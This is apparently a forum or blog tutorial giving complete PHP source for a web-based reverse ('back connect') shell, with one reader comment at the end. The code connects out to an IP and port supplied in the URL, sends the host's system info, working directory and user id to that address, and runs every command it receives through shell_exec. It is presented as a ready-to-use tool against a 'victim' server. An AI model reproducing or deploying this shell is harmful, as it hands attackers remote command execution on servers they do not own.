Back Connect Shell also known as Reverse Shell is a Piece of Code which is used to Host a Shell on the Server or the Victim, But instead of sitting there and listening for connections (As in the Case of Bind Shell) it rather Connects Back to the Attacker Machine. I already explained the Difference between a Bind Shell and a Reverse Shell Here. In this tutorial we’ll be making a Back Connect Shell in PHP Code back-connect.php PHP: <?php /********************* @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com ********************/ ini_set('max_execution_time',0); ?> <html> <head> <title>Back Connect Shell -- PHP</title> </head> <body> <h1>Welcome to Back Connect Control Panel </h1> <p> Fill in the form Below to Start the Back Connect Service </p> <?php if( isset($_GET['port']) && isset($_GET['ip']) && $_GET['port'] != "" && $_GET['ip'] != "" ) { echo "<p>The Program is now trying to connect!</p>"; $ip = $_GET['ip']; $port=$_GET['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "<font color='red'><b>$errno</b> : $errstr</font>"; } else if (!$sockfd) { $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>"; } else { fputs ($sockfd , "\n=================================================================\n Back Connect in PHP\n Coded by lionaneesh\n @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com \n================================================================="); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $id = shell_exec("id"); $dateAndTime = shell_exec("time /t & date /T"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); fputs($sockfd ,$dateAndTime."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(Shell)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } } else { ?> <table align="center" > <form method="GET"> <td> <table style="border-spacing: 6px;"> <tr> <td>Port</td> <td> <input style="width: 200px;" name="port" value="31337" /> </td> </tr> <tr> <td>IP </td> <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/> </tr> <tr> <td> <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/> </td> </tr> </table> </td> </form> </tr> </table> <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p> <?php } ?> Its as easy as a couple of clicks to make it work and to use! Here is a Screen Shot of its Working :- Enj0y! And Don't forget to Comment!
Hi, i don't agre with the unauthorized usage of php in peoples servers even when your posted code is old and can be found with google in few seconds but you should protect the file with a password to avoid those bots to enter as ip some viagra site. else you can prevent google to view this page ...this only if you want to restrict usage for those who know the url to file.